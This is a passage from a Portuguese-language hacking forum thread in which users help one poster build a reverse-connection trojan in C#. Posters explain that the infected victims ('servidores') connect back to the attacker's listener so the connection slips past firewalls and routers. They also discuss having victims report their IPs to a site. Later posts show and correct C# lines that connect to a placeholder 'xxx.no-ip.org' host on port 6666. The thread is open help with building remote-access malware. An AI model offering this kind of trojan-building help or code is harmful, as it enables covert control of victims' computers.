Página 2 de 2 PrimeiroPrimeiro 12
Resultados 11 a 16 de 16
    Citação Postado originalmente por Dano Ver Post
    alguem ajuda aew, mas acho q da pra fazer a conexão reversa mesmo sendo o mesmo pc praa cliente e servidor né? até agora nao consegui fazer funfar ;S
    flww
    Isso não seria conexão revista, seria conexão direta. Você poderia fazer os SERVIDORES(infectados) enviarem seus IP quando se conectassem para um site e o seu CLIENTE(você) pegaria essa lista e disponibilizaria para você. Permitindo então que você faça a conexão com um dos infectados.

Citação Postado originalmente por Roork Ver Post
    Isso não seria conexão revista, seria conexão direta. Você poderia fazer os SERVIDORES(infectados) enviarem seus IP quando se conectassem para um site e o seu CLIENTE(você) pegaria essa lista e disponibilizaria para você. Permitindo então que você faça a conexão com um dos infectados.
    Na verdade a conexão reversa é quando os infectados se conectam ao "controle remoto" e fazem tudo a partir disso... e não só enviam o IP para uma lista
    MP Com dúvidas e pedidos de ajudas serão IGNORADAS
    "Mentes fracas não pensam,corpos fracos não lutam."

Microsoft Technology Associate: Software Development Fundamentals (C#
    )

Newbie Avatar de alien5380
    Data de Ingresso
    Apr 2009
    Citação Postado originalmente por Dano Ver Post
    alguem ajuda aew, mas acho q da pra fazer a conexão reversa mesmo sendo o mesmo pc praa cliente e servidor né? até agora nao consegui fazer funfar ;S
    flww
    Sim, funciona normalmente, cliente e servidor no mesmo pc, mas geralmente um firewall (até mesmo o que vem no windows) bloqueia o servidor, talvez seja o seu caso.
    A conexão reversa é melhor, pois a vitima que vai conectar em vc, fica mais fácil passar o firewall, roteador e de quebra vc não precisa pegar o IP dela. Mas como vc será o servidor terá que abrir uma porta do seu pc, liberar no firewall e no roteador se tiver.

É como eu escrevi no meu artigo...a parte de NAT , e liberação das portas vai ficar pelo lado do listener
    MP Com dúvidas e pedidos de ajudas serão IGNORADAS
    "Mentes fracas não pensam,corpos fracos não lutam."

Microsoft Technology Associate: Software Development Fundamentals (C#
    )

Lamer
    Data de Ingresso
    Jan 2010
    tinha parado, mas agora estou voltando ao projeto do trojan, já liberei portas, já fiz de tudo e nada ainda...queria ajuda de alguem que ja fez este tipo de trojan pra poder resolver.
    E quero saber também se está sintaxe está correta:
    Código PHP:
    tcpClient.Connect("xxx.no-ip.org"6666); 
    ou pra conectar em um no-ip teria que fazer alguma coisa antes de um simples connect.

Obrigado.

Ninguem reparou o erro de ele inves de colocar
    Código:
    Host
    colocou
    Código:
    "Host"
    ,Resultado:A função vai aceitar isso como String e não como a Var definida.
    Errado:

Código:
    IPHostEntry host = Dns.GetHostEntry("xxxx.no-ip.org");
    tcpClient.Connect("host", 6666)
    Correto:
    Código:
    IPHostEntry host = Dns.GetHostEntry("xxxx.no-ip.org");
    tcpClient.Connect(host, 6666)

Tags para este Tópico

Permissões de Postagem